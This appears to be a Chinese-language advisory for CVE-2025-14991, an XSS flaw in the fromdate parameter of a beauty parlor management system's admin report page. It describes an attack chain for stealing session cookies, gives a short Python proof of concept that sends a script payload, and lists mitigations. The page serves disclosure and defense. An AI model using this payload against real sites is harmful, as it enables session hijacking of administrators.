CVE-2025-14991 Campcodes在线美容店管理系统fromdate参数XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14991

漏洞类型

跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Campcodes Complete Online Beauty Parlor Management System 1.0

漏洞概述

CVE-2025-14991是Campcodes Complete Online Beauty Parlor Management System 1.0版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞位于管理后台的/admin/bwdates-reports-details.php文件中，攻击者可以通过操纵fromdate参数注入恶意JavaScript代码。由于该漏洞需要高权限用户交互才能触发，CVSS评分仅为2.4，但仍然可能对系统安全性造成威胁。攻击者可以利用此漏洞窃取管理员会话cookie、劫持用户账户或进行钓鱼攻击。该漏洞已在2025年12月21日公开披露， exploit已公开可用。建议相关用户及时更新系统或采取临时防护措施。

技术细节

该漏洞属于存储型跨站脚本(XSS)漏洞，存在于Campcodes在线美容店管理系统1.0版本的后台管理页面中。具体受影响的文件为/admin/bwdates-reports-details.php，攻击向量为fromdate参数。攻击者需要具备管理员权限，并诱导具有管理权限的用户访问包含恶意脚本的页面。当用户访问该页面时，注入的JavaScript代码会在用户浏览器中执行，可能导致会话劫持、敏感信息泄露等安全问题。由于漏洞位于管理后台，影响范围主要针对管理员账户，CVSS向量显示攻击复杂度低(AC:L)，但需要高权限用户交互(UI:R)才能成功利用。攻击者可通过构造特定的fromdate参数值来绕过基本的输入过滤，实现XSS攻击。

攻击链分析

STEP 1

步骤1

攻击者获取管理员账户访问权限或通过其他方式获取高权限账号

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的XSS payload，利用fromdate参数注入到/admin/bwdates-reports-details.php页面

STEP 3

步骤3

诱导其他管理员用户访问包含恶意脚本的页面或链接

STEP 4

步骤4

当管理员访问页面时，恶意JavaScript在其浏览器中执行，窃取会话cookie或进行其他恶意操作

STEP 5

步骤5

攻击者利用窃取的凭证进行进一步的攻击，如账户劫持或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14991 PoC - XSS in Campcodes Beauty Parlor Management System
# Affected file: /admin/bwdates-reports-details.php
# Affected parameter: fromdate

import requests
import urllib.parse

target_url = "http://target.com/admin/bwdates-reports-details.php"

# XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Construct malicious request
params = {
    "fromdate": xss_payload,
    "todate": "2025-01-01"
}

try:
    response = requests.get(target_url, params=params)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {urllib.parse.unquote(xss_payload)}")
    if xss_payload in response.text:
        print("[+] XSS vulnerability confirmed!")
    else:
        print("[-] XSS may be filtered or not reflected")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

Campcodes Complete Online Beauty Parlor Management System 1.0

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1)限制管理后台访问权限，仅允许受信任的IP地址访问；2)对所有用户输入实施严格的输入验证；3)启用HTTPOnly和Secure标志保护Cookie；4)部署Web应用防火墙(WAF)规则过滤XSS特征；5)对管理用户进行安全意识培训，提醒不要点击可疑链接；6)定期审查管理员操作日志，检测异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14991
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14991
3 Details https://www.cvedetails.com/cve/CVE-2025-14991/
4 VulDB https://vuldb.com/cve/CVE-2025-14991
5 Link https://github.com/funnnxxx/my-cve/issues/1
6 Link https://vuldb.com/?ctiid.337685
7 Link https://vuldb.com/?id.337685
8 Link https://vuldb.com/?submit.718458
9 Link https://www.campcodes.com/